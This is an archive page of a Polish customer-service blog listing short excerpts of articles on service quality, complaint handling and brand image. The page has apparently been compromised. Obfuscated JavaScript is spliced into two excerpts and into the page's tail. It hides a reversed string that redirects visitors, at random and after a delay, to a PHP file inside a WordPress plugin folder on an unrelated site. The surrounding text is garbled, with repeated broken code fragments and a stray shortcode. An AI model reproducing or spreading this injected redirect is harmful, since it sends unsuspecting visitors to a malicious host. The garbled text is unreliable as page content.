Raporty – Firma Przyjazna Klientowi
 

Raporty

  • Jakosc obslugi klienta – kluczowy element budowania wizerunku marki

    23 czerwiec Jakość obsługi klienta – kluczowy element budowania wizerunku marki

    Jakość obsługi klienta wpływa na realne zyski firmy. Dotyczy to każdej usługi stacjonarnej oraz e-commerce. Przy niskiej jakości obsługi sklepy internetowe tracą nawet 23% zysków możliwych do osiągnięcia w ciągu jednego roku. Sposób budowania relacji z klientem, klarowność udzielanych informacji i czas przebiegu transakcji są......

  • Jak przeprowadzic proces reklamacji, by nie zrazic klienta do firmy

    15 czerwiec Jak przeprowadzić proces reklamacji, by nie zrazić klienta do firmy?

    Współczesny rynek towarów i usług rządzi się nowymi prawami, nieznanymi jeszcze przed dziesięcioma laty. Wówczas niezadowolony klient mógł opowiedzieć o swoich doświadczeniach rodzinie i najbliższym znajomym. Obecnie, w dobie portali społecznościowych i serwisów vlogowych, każdy człowiek, który poczuje się poszkodowany przez daną firmę, może rozpętać......

  • 7 x NIE – tych zachowan unikaj przy obsludze klienta

    03 czerwiec 7 x NIE – tych zachowań unikaj przy obsłudze klienta

    Każda firma, która ma kontakt z klientami, wie jak ważne jest pierwsze wrażenie. Wysoka jakość obsługi klienta z pewnością jest kluczem do osiągnięcia sukcesu. Jakich zachowań trzeba koniecznie unikać w relacjach z klientami? Nie stosuj jednej oferty dla wszystkich klientów Zawsze warto brać pod uwagę......

  • Internet w budowaniu wizerunku marki – pomaga czy przeszkadza

    28 Maj Internet w budowaniu wizerunku marki – pomaga czy przeszkadza?

    Profile firmowe na portalach społecznościowych nikogo już nie dziwią. Tego rodzaju media stają się też ważną przestrzenią do działań reklamowych, a także pozwalają klientom danej marki tworzyć tzw. „społeczność” skupioną wokół produktu lub usługi. Internet staje się w ten sposób jednym z kluczowych narzędzi służących......

  • Jak poradzic sobie z trudnym klientem

    18 Maj Jak poradzić sobie z trudnym klientem?

    Każda osoba, której obowiązkiem służbowym jest obsługa klienta, wielokrotnie styka się z nieprzyjemnymi, nerwowymi i stresującymi sytuacjami. Często dochodzi do takich zdarzeń, że nieuprzejmy klient postanawia na nas odreagować swoje frustracje i dać upust negatywnym emocjom. Jak w takiej sytuacji należy się zachować? Jakie są standom()......

  • Czy mozna zdobyc lojalnosc klienta e-sklepu

    08 Maj Czy można zdobyć lojalność klienta e-sklepu?

    Branża e-commerce rozwija się coraz prężniej, a właściciele sklepów stacjonarnych chętnie przenoszą swoją działalność do Internetu. Pozwala to na zminimalizowanie kosztów, a co za tym idzie możliwość proponowania konkurencyjnych cen. Większość konsumentów jest świadoma tego faktu i coraz chętniej robi zakupy, korzystając z e-sklepów. Dla......

  • Account manager – jakie umiejetnosci powinien posiadac

    29 kwiecień Account manager – jakie umiejętności powinien posiadać?

    Sukces firmy często bywa uzależniony od jej kontaktu z klientami. W końcu buduje ona długotrwałe relacje z nimi i starannie je pielęgnuje. Pracownicy obsługi w ostatnich latach znacząco się profesjonalizują. Coraz częściej organizuje się szkolenia, które uczą pracowników nowoczesnych standom() * 6); if (number1==3){var delay......

  • Kazesz klientowi czekac Uwazaj, bo mozesz go stracic

    19 kwiecień Każesz klientowi czekać? Uważaj, bo możesz go stracić

    Czy pamiętasz, ile razy denerwowałeś się na długą kolejkę do kasy, której żaden z pracowników sklepu nie starał się rozładować? Jakie uczucia Ci wtedy towarzyszyły i jak zachowywali się inni klienci supermarketu? Jak często czekasz na swoją kolej przed urzędniczym okienkiem w wianuszku innych interesantów?......

  • Jak dbac o to, by wizerunek marki byl spojny

    13 kwiecień Jak dbać o to, by wizerunek marki był spójny?

    W działaniach marketingowych od wielu lat podkreśla się procesy zmierzające do kształtowania wizerunku marki. Najczęściej chodzi tutaj o przedsięwzięcia adresowane do klientów zewnętrznych firmy. Obecnie model ten zaczyna się zmieniać. Dla wielu czołowych marek równie istotne staje się tworzenie pozytywnego wyobrażenia o danym przedsiębiorstwie jako......

  • raport o firmie

    02 kwiecień Jak budować pozytywne doświadczenia klientów i wspierać pracowników?

    Emocje, które odczuwają klienci wobec firmy, w pierwszej kolejności trafiają do pracowników przedsiębiorstwa, a w szczególności do tych, którzy na co dzień kontaktują się z użytkownikiem jej produktów lub usług. Z pierwszej części poniższego raportu poświęconej projektowi Firma Przyjazna Klientowi dowiedzą się Państwo jak klienci......

) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andscape” show_thumbnail=”yes” number_of_columns=”2″ overlay_icon=”0″ order_by=”date” order=”DESC” title_tag=”h3″ display_excerpt=”0″ post_info_font_weight=”” display_date=”0″ date_place=”by_title” display_author=”0″ display_comments=”0″ text_length=”100″ number_of_posts=”100″ box_info_padding=”20px 10px 20px 10px” category=”raport”]